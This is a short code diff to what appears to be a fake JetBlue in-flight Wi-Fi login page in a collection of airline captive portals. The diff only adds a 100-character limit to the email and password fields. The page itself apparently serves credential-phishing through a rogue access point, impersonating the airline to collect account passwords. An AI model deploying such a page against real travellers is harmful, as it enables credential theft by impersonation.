--- a/portals/airlines/Jet_Blue.html
+++ b/portals/airlines/Jet_Blue.html
@@ -44,10 +44,10 @@
                     <h1>Welcome aboard!</h1>
                     <h2>Sign in with your JetBlue<br>Account to use Wi-Fi</h2>
                     <div class="form-group">
-                        <input name="email" type="text" class="form-control" placeholder="Email" required>
+                        <input name="email" type="text" class="form-control" placeholder="Email" maxlength="100" required>
                     </div>
                     <div class="form-group">
-                        <input name="password" type="password" class="form-control" placeholder="Password" required>
+                        <input name="password" type="password" class="form-control" placeholder="Password" maxlength="100" required>
                     </div>
                     <div class="form-group">
                         <button class="btn btn-primary" type="submit">Sign In</button>
